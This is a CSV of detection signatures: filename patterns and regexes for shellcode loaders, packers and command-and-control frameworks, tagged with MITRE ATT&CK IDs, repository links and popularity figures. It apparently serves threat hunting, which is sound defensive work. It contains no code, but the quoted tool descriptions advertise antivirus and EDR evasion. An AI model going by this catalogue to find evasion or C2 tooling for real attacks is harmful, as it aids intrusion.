"*shellcode.bin.donut*",".{0,1000}shellcode\.bin\.donut.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*Shellcode.x64.bin*",".{0,1000}Shellcode\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*shellcode_dll.dll*",".{0,1000}shellcode_dll\.dll.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shellcode_dll\*",".{0,1000}shellcode_dll\\.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shellcode_dotnet2js*",".{0,1000}shellcode_dotnet2js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*shellcode_dropper.c*",".{0,1000}shellcode_dropper\.c.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*shellcode_dynwrapx*",".{0,1000}shellcode_dynwrapx.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Shellcode_encryption.exe*",".{0,1000}Shellcode_encryption\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","401","48","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*shellcode_exec.py*",".{0,1000}shellcode_exec\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*shellcode_generator.*",".{0,1000}shellcode_generator\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*shellcode_generator_help.html*",".{0,1000}shellcode_generator_help\.html.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*shellcode_inject.csproj*",".{0,1000}shellcode_inject\.csproj.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1445","249","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" "*shellcode_inject.rb*",".{0,1000}shellcode_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*shellcode_injectproc.xml*",".{0,1000}shellcode_injectproc\.xml.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*ShellCode_Loader.py*",".{0,1000}ShellCode_Loader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","401","48","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*shellcode1 += b*",".{0,1000}shellcode1\s\+\=\sb.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*shellcode20.exe*",".{0,1000}shellcode20\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*shellcode30.exe*",".{0,1000}shellcode30\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*shellcode35.exe*",".{0,1000}shellcode35\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*shellcode40.exe*",".{0,1000}shellcode40\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*shellcodeCrypter-bin.py*",".{0,1000}shellcodeCrypter\-bin\.py.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*shellcodeCrypter-msfvenom.py*",".{0,1000}shellcodeCrypter\-msfvenom\.py.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*Shellcode-Download_CreateThread_Execution*",".{0,1000}Shellcode\-Download_CreateThread_Execution.{0,1000}","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","3","243","51","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z" "*Shellcode-Downloader-CreateThread-Execution*",".{0,1000}Shellcode\-Downloader\-CreateThread\-Execution.{0,1000}","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","3","243","51","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z" "*shellcodeEncryptDecrypt*",".{0,1000}shellcodeEncryptDecrypt.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*shellcode-exec.ps1*",".{0,1000}shellcode\-exec\.ps1.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shellcodeexec.x32*",".{0,1000}shellcodeexec\.x32.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*shellcodeexec.x64*",".{0,1000}shellcodeexec\.x64.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*ShellcodeFluctuation.*",".{0,1000}ShellcodeFluctuation\..{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*ShellcodeFluctuation64*",".{0,1000}ShellcodeFluctuation64.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*ShellcodeFluctuation86*",".{0,1000}ShellcodeFluctuation86.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*Shellcode-Hide-main*",".{0,1000}Shellcode\-Hide\-main.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*shellcodeInjection.json*",".{0,1000}shellcodeInjection\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Shellcode-Loader-master*",".{0,1000}Shellcode\-Loader\-master.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","179","37","2024-04-08T20:20:59Z","2021-08-08T08:53:03Z" "*ShellcodeRDI.*",".{0,1000}ShellcodeRDI\..{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*ShellcodeRDI.py*",".{0,1000}ShellcodeRDI\.py.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*ShellcodeRDI.py*",".{0,1000}ShellcodeRDI\.py.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" 